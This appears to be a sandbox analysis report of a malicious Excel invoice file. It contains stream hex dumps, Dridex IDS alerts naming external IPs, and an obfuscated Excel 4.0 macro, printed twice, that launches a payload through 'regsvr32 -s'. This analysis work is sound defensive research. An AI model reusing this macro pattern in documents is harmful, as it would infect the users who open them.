                                                                                                                                Data ASCII:I D = " { 4 9 3 4 E D C 8 - 1 B 9 3 - 4 5 B C - B 6 9 0 - D B B 2 9 D 5 C 1 4 7 3 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " E E E C 1 D 3 1 E 5 F 1 D 7 F 5 D 7 F 5 D 7 F 5 D 7 F 5 " . . D P B = " D C D E 2 F 3 F F 3 2 C F 4 2 C F 4 2 C "
                                                                                                                                Data Raw:49 44 3d 22 7b 34 39 33 34 45 44 43 38 2d 31 42 39 33 2d 34 35 42 43 2d 42 36 39 30 2d 44 42 42 32 39 44 35 43 31 34 37 33 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 4e 61 6d 65 3d
                                                                                                                                Stream Path: PROJECTwm, File Type: data, Stream Size: 86
                                                                                                                                General
                                                                                                                                Stream Path:PROJECTwm
                                                                                                                                File Type:data
                                                                                                                                Stream Size:86
                                                                                                                                Entropy:3.24455457963
                                                                                                                                Base64 Encoded:False
                                                                                                                                Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . . .
                                                                                                                                Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 00 00
                                                                                                                                Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 3574
                                                                                                                                General
                                                                                                                                Stream Path:VBA/_VBA_PROJECT
                                                                                                                                File Type:data
                                                                                                                                Stream Size:3574
                                                                                                                                Entropy:4.45079869926
                                                                                                                                Base64 Encoded:False
                                                                                                                                Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
                                                                                                                                Data Raw:cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                                                                                Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 2060
                                                                                                                                General
                                                                                                                                Stream Path:VBA/__SRP_0
                                                                                                                                File Type:data
                                                                                                                                Stream Size:2060
                                                                                                                                Entropy:3.45011283232
                                                                                                                                Base64 Encoded:False
                                                                                                                                Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ X . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . . Y . n . M . . . W . . v _ . . . . . . . .
                                                                                                                                Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 02 00 00 00 00 00 01 00 02 00 02 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00
                                                                                                                                Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 187
                                                                                                                                General
                                                                                                                                Stream Path:VBA/__SRP_1
                                                                                                                                File Type:data
                                                                                                                                Stream Size:187
                                                                                                                                Entropy:1.91493173134
                                                                                                                                Base64 Encoded:False
                                                                                                                                Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w q . . . . . . . . . . . . . . . . n i m o . . . . . . . . . . . . . . . . y e l ^ . . . . . . . . . . . . . . .
                                                                                                                                Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00 03 00 02 00 00 00 00 00 00 08 02 00 00 00 00 00
                                                                                                                                Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 363
                                                                                                                                General
                                                                                                                                Stream Path:VBA/__SRP_2
                                                                                                                                File Type:data
                                                                                                                                Stream Size:363
                                                                                                                                Entropy:2.21122978445
                                                                                                                                Base64 Encoded:False
                                                                                                                                Data ASCII:r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                Data Raw:72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 398
                                                                                                                                General
                                                                                                                                Stream Path:VBA/__SRP_3
                                                                                                                                File Type:data
                                                                                                                                Stream Size:398
                                                                                                                                Entropy:2.07709195049
                                                                                                                                Base64 Encoded:False
                                                                                                                                Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . q . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . .
                                                                                                                                Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                                                                                                                                Stream Path: VBA/dir, File Type: data, Stream Size: 820
                                                                                                                                General
                                                                                                                                Stream Path:VBA/dir
                                                                                                                                File Type:data
                                                                                                                                Stream Size:820
                                                                                                                                Entropy:6.49145935167
                                                                                                                                Base64 Encoded:True
                                                                                                                                Data ASCII:. 0 . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . . a . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
                                                                                                                                Data Raw:01 30 b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 09 a2 eb 61 05 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                                                                                                                Macro 4.0 Code

                                                                                                                                CALL(wegb&o0, "S"&ohgdfww&"A", i0&i0&"CCCC"&i0, 0, v0&"p"&w00&"n", "r"&w00&"gsvr"&o0, " -s "&bb&ab&ba, 0, 0)
                                                                                                                                
                                                                                                                                "=CALL(wegb&o0,""S""&ohgdfww&""A"",i0&i0&""CCCC""&i0,0,v0&""p""&w00&""n"",""r""&w00&""gsvr""&o0,"" -s ""&bb&ab&ba,0,0)"=RETURN()

                                                                                                                                OLE File "/opt/package/joesandbox/database/analysis/338240/sample/INV8073565781-20210111319595.xlsm"

                                                                                                                                Indicators

                                                                                                                                Has Summary Info:False
                                                                                                                                Application Name:unknown
                                                                                                                                Encrypted Document:False
                                                                                                                                Contains Word Document Stream:
                                                                                                                                Contains Workbook/Book Stream:
                                                                                                                                Contains PowerPoint Document Stream:
                                                                                                                                Contains Visio Document Stream:
                                                                                                                                Contains ObjectPool Stream:
                                                                                                                                Flash Objects Count:
                                                                                                                                Contains VBA Macros:False

                                                                                                                                Summary

                                                                                                                                Author:
                                                                                                                                Last Saved By:
                                                                                                                                Create Time:2020-12-07T14:38:21Z
                                                                                                                                Last Saved Time:2021-01-11T14:32:26Z
                                                                                                                                Creating Application:Microsoft Excel
                                                                                                                                Security:0

                                                                                                                                Document Summary

                                                                                                                                Thumbnail Scaling Desired:false
                                                                                                                                Company:
                                                                                                                                Contains Dirty Links:false
                                                                                                                                Shared Document:false
                                                                                                                                Changed Hyperlinks:false
                                                                                                                                Application Version:16.0300

                                                                                                                                Streams

                                                                                                                                Stream Path: \x1CompObj, File Type: data, Stream Size: 115
                                                                                                                                General
                                                                                                                                Stream Path:\x1CompObj
                                                                                                                                File Type:data
                                                                                                                                Stream Size:115
                                                                                                                                Entropy:4.80096587863
                                                                                                                                Base64 Encoded:False
                                                                                                                                Data ASCII:. . . . . . . . . . . . p . . F z ? . . . . . . . a . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . M u l t i P a g e . 1 . . 9 . q . . . . . . . . . . . .
                                                                                                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 70 13 e3 46 7a 3f ce 11 be d6 00 aa 00 61 10 80 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 12 00 00 00 46 6f 72 6d 73 2e 4d 75 6c 74 69 50 61 67 65 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                Stream Path: f, File Type: data, Stream Size: 178
                                                                                                                                General
                                                                                                                                Stream Path:f
                                                                                                                                File Type:data
                                                                                                                                Stream Size:178
                                                                                                                                Entropy:2.56223021678
                                                                                                                                Base64 Encoded:False
                                                                                                                                Data ASCII:. . $ . H . . . . . . . . @ . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . t . . . . . . . . . . . . . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . . . # . . . . . . . P a g e 1 . . . . . . . . . . . . . $ . . . . . . . . . . . . . ! . . . . . . . P a g e 2 . . . 5 . . . . . . . . . . . . . . . T . . .
                                                                                                                                Data Raw:00 04 24 00 48 0c 00 0c 03 00 00 00 04 40 00 00 04 00 00 00 00 7d 00 00 84 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 74 00 00 00 00 83 01 00 00 00 1c 00 f4 01 00 00 01 00 00 00 32 00 00 00 98 00 00 00 00 00 12 00 00 00 00 00 00 00 00 00 00 00 24 00 d5 01 00 00 05 00 00 80 02 00 00 00 23 00 04 00 01 00 07 00 50 61 67 65 31 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                Stream Path: i02/\x1CompObj, File Type: data, Stream Size: 110
                                                                                                                                General
                                                                                                                                Stream Path:i02/\x1CompObj
                                                                                                                                File Type:data
                                                                                                                                Stream Size:110
                                                                                                                                Entropy:4.63372611993
                                                                                                                                Base64 Encoded:False
                                                                                                                                Data ASCII:. . . . . . . . . . . . . i * . . . . . . . . . . W J O . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F o r m . 1 . . 9 . q . . . . . . . . . . . .
                                                                                                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff f0 69 2a c6 dc 16 ce 11 9e 98 00 aa 00 57 4a 4f 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0d 00 00 00 46 6f 72 6d 73 2e 46 6f 72 6d 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                Stream Path: i02/f, File Type: data, Stream Size: 40
                                                                                                                                General
                                                                                                                                Stream Path:i02/f
                                                                                                                                File Type:data
                                                                                                                                Stream Size:40
                                                                                                                                Entropy:1.54176014818
                                                                                                                                Base64 Encoded:False
                                                                                                                                Data ASCII:. . . . @ . . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                Data Raw:00 04 1c 00 40 0c 00 08 04 80 00 00 00 7d 00 00 84 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                Stream Path: i02/o, File Type: empty, Stream Size: 0
                                                                                                                                General
                                                                                                                                Stream Path:i02/o
                                                                                                                                File Type:empty
                                                                                                                                Stream Size:0
                                                                                                                                Entropy:0.0
                                                                                                                                Base64 Encoded:False
                                                                                                                                Data ASCII:
                                                                                                                                Data Raw:
                                                                                                                                Stream Path: i03/\x1CompObj, File Type: data, Stream Size: 110
                                                                                                                                General
                                                                                                                                Stream Path:i03/\x1CompObj
                                                                                                                                File Type:data
                                                                                                                                Stream Size:110
                                                                                                                                Entropy:4.63372611993
                                                                                                                                Base64 Encoded:False
                                                                                                                                Data ASCII:. . . . . . . . . . . . . i * . . . . . . . . . . W J O . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F o r m . 1 . . 9 . q . . . . . . . . . . . .
                                                                                                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff f0 69 2a c6 dc 16 ce 11 9e 98 00 aa 00 57 4a 4f 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0d 00 00 00 46 6f 72 6d 73 2e 46 6f 72 6d 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                Stream Path: i03/f, File Type: data, Stream Size: 40
                                                                                                                                General
                                                                                                                                Stream Path:i03/f
                                                                                                                                File Type:data
                                                                                                                                Stream Size:40
                                                                                                                                Entropy:1.90677964945
                                                                                                                                Base64 Encoded:False
                                                                                                                                Data ASCII:. . . . @ . . . . . . . . } . . n . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                Data Raw:00 04 1c 00 40 0c 00 08 04 80 00 00 00 7d 00 00 6e 13 00 00 fd 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                Stream Path: i03/o, File Type: empty, Stream Size: 0
                                                                                                                                General
                                                                                                                                Stream Path:i03/o
                                                                                                                                File Type:empty
                                                                                                                                Stream Size:0
                                                                                                                                Entropy:0.0
                                                                                                                                Base64 Encoded:False
                                                                                                                                Data ASCII:
                                                                                                                                Data Raw:
                                                                                                                                Stream Path: o, File Type: data, Stream Size: 152
                                                                                                                                General
                                                                                                                                Stream Path:o
                                                                                                                                File Type:data
                                                                                                                                Stream Size:152
                                                                                                                                Entropy:2.68720470607
                                                                                                                                Base64 Encoded:False
                                                                                                                                Data ASCII:. . p . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P a g e 1 . . . . . . . P a g e 2 . . . . . . . . . . . . . . . T a b 3 . . . . T a b 4 . . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . C a l i b r i . . . . . . . . .
                                                                                                                                Data Raw:00 02 70 00 31 82 fa 00 00 00 00 00 18 00 00 00 02 00 00 00 08 00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 02 00 00 00 08 00 00 00 84 00 00 00 84 00 00 00 05 00 00 80 50 61 67 65 31 00 00 00 05 00 00 80 50 61 67 65 32 00 00 00 00 00 00 00 00 00 00 00 04 00 00 80 54 61 62 33 04 00 00 80 54 61 62 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 07 00 00 80
                                                                                                                                Stream Path: x, File Type: data, Stream Size: 48
                                                                                                                                General
                                                                                                                                Stream Path:x
                                                                                                                                File Type:data
                                                                                                                                Stream Size:48
                                                                                                                                Entropy:1.42267983198
                                                                                                                                Base64 Encoded:False
                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                Data Raw:00 02 04 00 00 00 00 00 00 02 04 00 00 00 00 00 00 02 04 00 00 00 00 00 00 02 0c 00 06 00 00 00 02 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00

                                                                                                                                Macro 4.0 Code

                                                                                                                                CALL(wegb&o0, "S"&ohgdfww&"A", i0&i0&"CCCC"&i0, 0, v0&"p"&w00&"n", "r"&w00&"gsvr"&o0, " -s "&bb&ab&ba, 0, 0)
                                                                                                                                
                                                                                                                                "=CALL(wegb&o0,""S""&ohgdfww&""A"",i0&i0&""CCCC""&i0,0,v0&""p""&w00&""n"",""r""&w00&""gsvr""&o0,"" -s ""&bb&ab&ba,0,0)"=RETURN()

                                                                                                                                Network Behavior

                                                                                                                                Snort IDS Alerts

                                                                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                01/11/21-20:47:41.098543TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434916677.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:47:43.841294TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084916880.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:47:44.417159TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491695.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:47:44.417159TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491695.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:47:45.534218TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434917177.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:47:46.052796TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084917280.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:47:46.620576TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491735.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:47:46.620576TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491735.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:47:47.673510TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434917577.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:47:48.188446TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084917680.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:47:48.702464TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491775.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:47:48.702464TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491775.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:47:49.762134TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434917977.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:47:50.290166TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084918080.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:47:50.819433TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491815.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:47:50.819433TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491815.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:47:51.899759TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434918377.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:47:52.422991TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084918480.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:47:52.940965TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491855.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:47:52.940965TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491855.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:47:53.972881TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434918777.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:47:54.502255TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084918880.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:47:55.029925TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491895.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:47:55.029925TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491895.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:47:56.048129TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434919177.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:47:56.574966TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084919280.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:47:57.089881TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491935.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:47:57.089881TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491935.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:47:58.141265TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434919577.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:47:58.663541TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084919680.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:47:59.236713TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491975.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:47:59.236713TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491975.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:01.461744TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434919977.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:48:01.990394TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084920080.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:48:02.572459TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492015.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:02.572459TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492015.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:03.625437TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434920377.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:48:04.154356TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084920480.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:48:04.694273TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492055.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:04.694273TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492055.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:05.735890TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434920777.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:48:06.250458TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084920880.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:48:06.773073TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492095.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:06.773073TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492095.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:07.828961TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434921177.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:48:08.351383TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084921280.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:48:08.864837TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492135.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:08.864837TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492135.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:09.938128TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434921577.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:48:10.463656TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084921680.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:48:10.973087TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492175.100.228.233192.168.2.22
